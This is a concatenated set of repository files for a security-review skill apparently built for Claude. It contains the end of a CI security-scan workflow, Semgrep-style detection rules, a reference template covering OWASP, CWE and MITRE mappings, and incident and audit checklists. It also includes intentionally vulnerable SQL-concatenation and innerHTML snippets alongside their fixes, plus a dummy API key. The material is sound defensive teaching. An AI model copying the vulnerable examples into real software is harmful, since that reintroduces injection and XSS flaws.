const report = fs.readFileSync('consolidated-report/security-summary.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: report
});
- name: Upload Consolidated Report
if: always()
uses: actions/upload-artifact@v4
with:
name: consolidated-security-report
path: consolidated-report/
retention-days: 90
# Security Best Practices Demonstrated:
#
# 1. ✅ Minimal permissions (principle of least privilege)
# 2. ✅ Multiple security scan types (defense in depth)
# 3. ✅ Fail-fast on critical findings
# 4. ✅ Secrets detection across full git history
# 5. ✅ Container image scanning before deployment
# 6. ✅ IaC scanning for misconfigurations
# 7. ✅ Artifact retention for compliance audit trail
# 8. ✅ SARIF format for GitHub Security integration
# 9. ✅ Scheduled scans for continuous monitoring
# 10. ✅ PR comments for developer feedback
#
# Compliance Mappings:
# - SOC 2: CC6.1, CC6.6, CC7.2 (Security monitoring and logging)
# - PCI-DSS: 6.2, 6.5 (Secure development practices)
# - NIST: SA-11 (Developer Security Testing)
# - OWASP: Integrated security testing throughout SDLC

View File

@@ -0,0 +1,355 @@
# Security Rule Template
#
# This template demonstrates how to structure security rules/policies.
# Adapt this template to your specific security tool (Semgrep, OPA, etc.)
#
# Rule Structure Best Practices:
# - Clear rule ID and metadata
# - Severity classification
# - Framework mappings (OWASP, CWE)
# - Remediation guidance
# - Example vulnerable and fixed code
rules:
# Example Rule 1: SQL Injection Detection
- id: sql-injection-string-concatenation
metadata:
name: "SQL Injection via String Concatenation"
description: "Detects potential SQL injection vulnerabilities from string concatenation in SQL queries"
severity: "HIGH"
category: "security"
subcategory: "injection"
# Security Framework Mappings
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-89: SQL Injection"
mitre_attack:
- "T1190: Exploit Public-Facing Application"
# Compliance Standards
compliance:
- "PCI-DSS 6.5.1: Injection flaws"
- "NIST 800-53 SI-10: Information Input Validation"
# Confidence and Impact
confidence: "HIGH"
likelihood: "HIGH"
impact: "HIGH"
# References
references:
- "https://owasp.org/www-community/attacks/SQL_Injection"
- "https://cwe.mitre.org/data/definitions/89.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
# Languages this rule applies to
languages:
- python
- javascript
- java
- go
# Detection Pattern (example using Semgrep-style syntax)
pattern-either:
- pattern: |
cursor.execute($SQL + $VAR)
- pattern: |
cursor.execute(f"... {$VAR} ...")
- pattern: |
cursor.execute("..." + $VAR + "...")
# What to report when found
message: |
Potential SQL injection vulnerability detected. SQL query is constructed using
string concatenation or f-strings with user input. This allows attackers to
inject malicious SQL code.
Use parameterized queries instead:
- Python: cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
- JavaScript: db.query("SELECT * FROM users WHERE id = $1", [userId])
See: https://owasp.org/www-community/attacks/SQL_Injection
# Suggested fix (auto-fix if supported)
fix: |
Use parameterized queries with placeholders
# Example vulnerable code
examples:
- vulnerable: |
# Vulnerable: String concatenation
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
- fixed: |
# Fixed: Parameterized query
user_id = request.GET['id']
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Example Rule 2: Hardcoded Secrets Detection
- id: hardcoded-secret-credential
metadata:
name: "Hardcoded Secret or Credential"
description: "Detects hardcoded secrets, API keys, passwords, or tokens in source code"
severity: "CRITICAL"
category: "security"
subcategory: "secrets"
owasp:
- "A07:2021 - Identification and Authentication Failures"
cwe:
- "CWE-798: Use of Hard-coded Credentials"
- "CWE-259: Use of Hard-coded Password"
compliance:
- "PCI-DSS 8.2.1: Use of strong cryptography"
- "SOC 2 CC6.1: Logical access controls"
- "GDPR Article 32: Security of processing"
confidence: "MEDIUM"
likelihood: "HIGH"
impact: "CRITICAL"
references:
- "https://cwe.mitre.org/data/definitions/798.html"
- "https://owasp.org/www-community/vulnerabilities/Use_of_hard-coded_password"
languages:
- python
- javascript
- java
- go
- ruby
pattern-either:
- pattern: |
password = "..."
- pattern: |
api_key = "..."
- pattern: |
secret = "..."
- pattern: |
token = "..."
pattern-not: |
$VAR = ""
message: |
Potential hardcoded secret detected. Hardcoding credentials in source code
is a critical security vulnerability that can lead to unauthorized access
if the code is exposed.
Use environment variables or a secrets management system instead:
- Python: os.environ.get('API_KEY')
- Node.js: process.env.API_KEY
- Secrets Manager: AWS Secrets Manager, HashiCorp Vault, etc.
See: https://cwe.mitre.org/data/definitions/798.html
examples:
- vulnerable: |
# Vulnerable: Hardcoded API key
api_key = "sk-1234567890abcdef"
api.authenticate(api_key)
- fixed: |
# Fixed: Environment variable
import os
api_key = os.environ.get('API_KEY')
if not api_key:
raise ValueError("API_KEY environment variable not set")
api.authenticate(api_key)
# Example Rule 3: XSS via Unsafe HTML Rendering
- id: xss-unsafe-html-rendering
metadata:
name: "Cross-Site Scripting (XSS) via Unsafe HTML"
description: "Detects unsafe HTML rendering that could lead to XSS vulnerabilities"
severity: "HIGH"
category: "security"
subcategory: "xss"
owasp:
- "A03:2021 - Injection"
cwe:
- "CWE-79: Cross-site Scripting (XSS)"
- "CWE-80: Improper Neutralization of Script-Related HTML Tags"
compliance:
- "PCI-DSS 6.5.7: Cross-site scripting"
- "NIST 800-53 SI-10: Information Input Validation"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://owasp.org/www-community/attacks/xss/"
- "https://cwe.mitre.org/data/definitions/79.html"
- "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
languages:
- javascript
- typescript
- jsx
- tsx
pattern-either:
- pattern: |
dangerouslySetInnerHTML={{__html: $VAR}}
- pattern: |
innerHTML = $VAR
message: |
Potential XSS vulnerability detected. Setting HTML content directly from
user input without sanitization can allow attackers to inject malicious
JavaScript code.
Use one of these safe alternatives:
- React: Use {userInput} for automatic escaping
- DOMPurify: const clean = DOMPurify.sanitize(dirty);
- Framework-specific sanitizers
See: https://owasp.org/www-community/attacks/xss/
examples:
- vulnerable: |
// Vulnerable: Unsanitized HTML
function UserComment({ comment }) {
return <div dangerouslySetInnerHTML={{__html: comment}} />;
}
- fixed: |
// Fixed: Sanitized with DOMPurify
import DOMPurify from 'dompurify';
function UserComment({ comment }) {
const sanitized = DOMPurify.sanitize(comment);
return <div dangerouslySetInnerHTML={{__html: sanitized}} />;
}
# Example Rule 4: Insecure Cryptography
- id: weak-cryptographic-algorithm
metadata:
name: "Weak Cryptographic Algorithm"
description: "Detects use of weak or deprecated cryptographic algorithms"
severity: "HIGH"
category: "security"
subcategory: "cryptography"
owasp:
- "A02:2021 - Cryptographic Failures"
cwe:
- "CWE-327: Use of a Broken or Risky Cryptographic Algorithm"
- "CWE-326: Inadequate Encryption Strength"
compliance:
- "PCI-DSS 4.1: Use strong cryptography"
- "NIST 800-53 SC-13: Cryptographic Protection"
- "GDPR Article 32: Security of processing"
confidence: "HIGH"
likelihood: "MEDIUM"
impact: "HIGH"
references:
- "https://cwe.mitre.org/data/definitions/327.html"
- "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/"
languages:
- python
- javascript
- java
pattern-either:
- pattern: |
hashlib.md5(...)
- pattern: |
hashlib.sha1(...)
- pattern: |
crypto.createHash('md5')
- pattern: |
crypto.createHash('sha1')
message: |
Weak cryptographic algorithm detected (MD5 or SHA1). These algorithms are
considered cryptographically broken and should not be used for security purposes.
Use strong alternatives:
- For hashing: SHA-256, SHA-384, or SHA-512
- For password hashing: bcrypt, argon2, or PBKDF2
- Python: hashlib.sha256()
- Node.js: crypto.createHash('sha256')
See: https://cwe.mitre.org/data/definitions/327.html
examples:
- vulnerable: |
# Vulnerable: MD5 hash
import hashlib
hash_value = hashlib.md5(data).hexdigest()
- fixed: |
# Fixed: SHA-256 hash
import hashlib
hash_value = hashlib.sha256(data).hexdigest()
# Rule Configuration
configuration:
# Global settings
enabled: true
severity_threshold: "MEDIUM" # Report findings at MEDIUM severity and above
# Performance tuning
max_file_size_kb: 1024
exclude_patterns:
- "test/*"
- "tests/*"
- "node_modules/*"
- "vendor/*"
- "*.min.js"
# False positive reduction
confidence_threshold: "MEDIUM" # Only report findings with MEDIUM confidence or higher
# Rule Metadata Schema
# This section documents the expected structure for rules
metadata_schema:
required:
- id: "Unique identifier for the rule (kebab-case)"
- name: "Human-readable rule name"
- description: "What the rule detects"
- severity: "CRITICAL | HIGH | MEDIUM | LOW | INFO"
- category: "security | best-practice | performance"
optional:
- subcategory: "Specific type (injection, xss, secrets, etc.)"
- owasp: "OWASP Top 10 mappings"
- cwe: "CWE identifier(s)"
- mitre_attack: "MITRE ATT&CK technique(s)"
- compliance: "Compliance standard references"
- confidence: "Detection confidence level"
- likelihood: "Likelihood of exploitation"
- impact: "Potential impact if exploited"
- references: "External documentation links"
# Usage Instructions:
#
# 1. Copy this template when creating new security rules
# 2. Update metadata fields with appropriate framework mappings
# 3. Customize detection patterns for your tool (Semgrep, OPA, etc.)
# 4. Provide clear remediation guidance in the message field
# 5. Include both vulnerable and fixed code examples
# 6. Test rules on real codebases before deployment
#
# Best Practices:
# - Map to multiple frameworks (OWASP, CWE, MITRE ATT&CK)
# - Include compliance standard references
# - Provide actionable remediation guidance
# - Show code examples (vulnerable vs. fixed)
# - Tune confidence levels to reduce false positives
# - Exclude test directories to reduce noise

View File

@@ -0,0 +1,550 @@
# Reference Document Template
This file demonstrates how to structure detailed reference material that Claude loads on-demand.
**When to use this reference**: Include a clear statement about when Claude should consult this document.
For example: "Consult this reference when analyzing Python code for security vulnerabilities and needing detailed remediation patterns."
**Document purpose**: Briefly explain what this reference provides that's not in SKILL.md.
---
## Table of Contents
**For documents >100 lines, always include a table of contents** to help Claude navigate quickly.
- [When to Use References](#when-to-use-references)
- [Document Organization](#document-organization)
- [Detailed Technical Content](#detailed-technical-content)
- [Security Framework Mappings](#security-framework-mappings)
- [OWASP Top 10](#owasp-top-10)
- [CWE Mappings](#cwe-mappings)
- [MITRE ATT&CK](#mitre-attck)
- [Remediation Patterns](#remediation-patterns)
- [Advanced Configuration](#advanced-configuration)
- [Examples and Code Samples](#examples-and-code-samples)
---
## When to Use References
**Move content from SKILL.md to references/** when:
1. **Content exceeds 100 lines** - Keep SKILL.md concise
2. **Framework-specific details** - Detailed OWASP/CWE/MITRE mappings
3. **Advanced user content** - Deep technical details for expert users
4. **Lookup-oriented content** - Rule libraries, configuration matrices, comprehensive lists
5. **Language-specific patterns** - Separate files per language/framework
6. **Historical context** - Old patterns and deprecated approaches
**Keep in SKILL.md**:
- Core workflows (top 3-5 use cases)
- Decision points and branching logic
- Quick start guidance
- Essential security considerations
---
## Document Organization
### Structure for Long Documents
For references >100 lines:
```markdown
# Title
**When to use**: Clear trigger statement
**Purpose**: What this provides
## Table of Contents
- Links to all major sections
## Quick Reference
- Key facts or commands for fast lookup
## Detailed Content
- Comprehensive information organized logically
## Framework Mappings
- OWASP, CWE, MITRE ATT&CK references
## Examples
- Code samples and patterns
```
### Section Naming Conventions
- Use **imperative** or **declarative** headings
- ✅ "Detecting SQL Injection" not "How to detect SQL Injection"
- ✅ "Common Patterns" not "These are common patterns"
- Make headings **searchable** and **specific**
---
## Detailed Technical Content
This section demonstrates the type of detailed content that belongs in references rather than SKILL.md.
### Example: Comprehensive Vulnerability Detection
#### SQL Injection Detection Patterns
**Pattern 1: String Concatenation in Queries**
```python
# Vulnerable pattern
query = "SELECT * FROM users WHERE id = " + user_id
cursor.execute(query)
# Detection criteria:
# - SQL keyword (SELECT, INSERT, UPDATE, DELETE)
# - String concatenation operator (+, f-string)
# - Variable user input (request params, form data)
# Severity: HIGH
# CWE: CWE-89
# OWASP: A03:2021 - Injection
```
**Remediation**:
```python
# Fixed: Parameterized query
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# OR using ORM
user = User.objects.get(id=user_id)
```
**Pattern 2: Unsafe String Formatting**
```python
# Vulnerable patterns
query = f"SELECT * FROM users WHERE name = '{username}'"
query = "SELECT * FROM users WHERE name = '%s'" % username
query = "SELECT * FROM users WHERE name = '{}'".format(username)
# All three patterns are vulnerable to SQL injection
```
#### Cross-Site Scripting (XSS) Detection
**Pattern 1: Unescaped Output in Templates**
```javascript
// Vulnerable: Direct HTML injection
element.innerHTML = userInput;
document.write(userInput);
// Vulnerable: React dangerouslySetInnerHTML
<div dangerouslySetInnerHTML={{__html: userComment}} />
// Detection criteria:
# - Direct DOM manipulation (innerHTML, document.write)
# - React dangerouslySetInnerHTML with user data
# - Template engines with autoescaping disabled
// Severity: HIGH
// CWE: CWE-79
// OWASP: A03:2021 - Injection
```
**Remediation**:
```javascript
// Fixed: Escaped output
element.textContent = userInput; // Auto-escapes
// Fixed: Sanitization library
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(userComment);
<div dangerouslySetInnerHTML={{__html: clean}} />
```
---
## Security Framework Mappings
This section provides comprehensive security framework mappings for findings.
### OWASP Top 10
Map security findings to OWASP Top 10 (2021) categories:
| Category | Title | Common Vulnerabilities |
|----------|-------|----------------------|
| **A01:2021** | Broken Access Control | Authorization bypass, privilege escalation, IDOR |
| **A02:2021** | Cryptographic Failures | Weak crypto, plaintext storage, insecure TLS |
| **A03:2021** | Injection | SQL injection, XSS, command injection, LDAP injection |
| **A04:2021** | Insecure Design | Missing security controls, threat modeling gaps |
| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,708 @@
---
name: api-spectral
description: >
API specification linting and security validation using Stoplight's Spectral with support for
OpenAPI, AsyncAPI, and Arazzo specifications. Validates API definitions against security best
practices, OWASP API Security Top 10, and custom organizational standards. Use when: (1) Validating
OpenAPI/AsyncAPI specifications for security issues and design flaws, (2) Enforcing API design
standards and governance policies across API portfolios, (3) Creating custom security rules for
API specifications in CI/CD pipelines, (4) Detecting authentication, authorization, and data
exposure issues in API definitions, (5) Ensuring API specifications comply with organizational
security standards and regulatory requirements.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [api-security, openapi, asyncapi, linting, spectral, api-governance, owasp-api, specification-validation]
frameworks: [OWASP]
dependencies:
tools: [node, npm]
optional: [docker, git]
references:
- https://docs.stoplight.io/docs/spectral/674b27b261c3c-overview
- https://github.com/stoplightio/spectral
- https://owasp.org/API-Security/editions/2023/en/0x11-t10/
---
# API Security with Spectral
## Overview
Spectral is a flexible JSON/YAML linter from Stoplight that validates API specifications against
security best practices and organizational standards. With built-in rulesets for OpenAPI v2/v3.x,
